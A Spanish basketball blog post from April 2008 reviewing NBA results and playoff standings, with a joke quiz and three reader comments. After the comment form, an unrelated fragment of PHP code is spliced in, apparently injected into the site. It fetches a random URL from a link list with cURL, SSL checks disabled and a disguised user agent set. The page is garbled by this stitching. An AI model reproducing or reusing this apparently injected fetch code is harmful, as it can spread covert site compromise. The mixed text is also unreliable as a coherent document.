¡Extra, extra!: San Antonio gana sin jugar

09 de April de 2008 por Viva_Dirk

Las derrotas de Hornets y Lakers la pasada madrugada ponen a San Antonio un poco más cerca de la primera plaza y un poco más lejos de la tercera. Y no es que demos por hecho que los Spurs van a ganar esta noche a los Suns, pero casi damos por hecho que ganarán a Seattle, Sacramento e incluso a Utah en el Alamo.

La derrota de los Hornets en casa contra un equipo que baja mucho a domicilio como Utah no entraba en los planes de la mayoría, pero lo que no entraba en los planes de nadie es que a estas alturas hiciesen su anotación más baja de toda la temporada, con el peor partido de Chris Paul. Esto para algunos es una muestra de la inexperiencia de este equipo y para otros un simple mal partido.

Aún peor es la derrota de Lakers en casa de Portland, cuando los de McMillan no se juegan absolutamente nada. Jugándose la primera plaza del Oeste, los californianos llevaron a cabo una defensa…. bueno, no llevaron a cabo ninguna defensa y resultaron especialmente sangrantes los 44 puntos y 27 rebotes que sumaron Aldridge & Frye. No es la primera vez que se ve este tipo de partido a los de Jackson: las 2 derrotas consecutivas en el Staples contra Memphis y Charlotte (sí, sí, han leído bien) dejaron la misma imagen. Los más optimistas esperan que esto cambie con la vuelta de Bynum, los más pesimistas dicen que el equipo llega fundido y el resto se limita a esperar pensando que el potencial del equipo saldrá en los momentos claves.

En otros menesteres, Dallas está cerca de asegurarse la 7ª plaza, mientras Warriors y Nuggets se compenetran para ganar o perder al compás. En el Este, Boston no pierde ni con los suplentes y puede completar su mejor temporada desde hace 22 años en caso de ganar los 4 partidos que le quedan. Los Pacers, de la mano de Mike Dunleavy, aprietan a los Hawks, aunque con Miami y NY en el camino, es muy difícil que los de la ciudad de la Coca-Cola pierdan el 8º puesto.

Para terminar el repaso a la jornada, vamos con uno de nuestros pasatiempos:

¿Qué le preocupa a Jim Boylan, entrenador de los Chicago Bulls?

a) Intenta explicarse cómo puede ser que sus Bulls hayan perdido contra un equipo de la D-League.

b) Intenta memorizar el nombre del máximo anotador de los Heat (Kasib Powell), para buscarlo en la página NBA.com en cuanto llegue a casa.

c) Intenta memorizar el nombre del máximo asistente de los Heat (Chris Quinn), para buscarlo en la página NBA.com en cuanto llegue a casa.

d) Intenta pasar lo máximo desapercibido posible, a ver si así se olvidan de su existencia.

e) Todas las anteriores

f) La b y la c pero no la a (¿para qué la autocrítica? )

Comenta

3 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Por un lado da mucha rabia que perdamos partidos contra Blazers, Grizz, Bobcats y demás calaña. Por otro, me tranquiliza que jugamos bien contra los buenos equipos. Si Bynum vuelve en una condiciones más o menos decentes estaremos en situación de aspirar a todo. Si no, echaremos de menos su presencia más en defensa que en ataque.

      Citar

  2. TheDeerHunter dice:
    #2

    En efecto, si sólo pierdes contra los malos en playoffs ganarás seguro…

    El problema es que no sé porqué pero me da en la nariz que no es una estrategia demasiado realista como para que los Lakers la pongan en práctica.

      Citar

  3. TheDeerHunter dice:
    #3

    Aunque hay que tener cuidado, no sea que a algún equipo se le ocurra jugar sólo con los suplentes…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>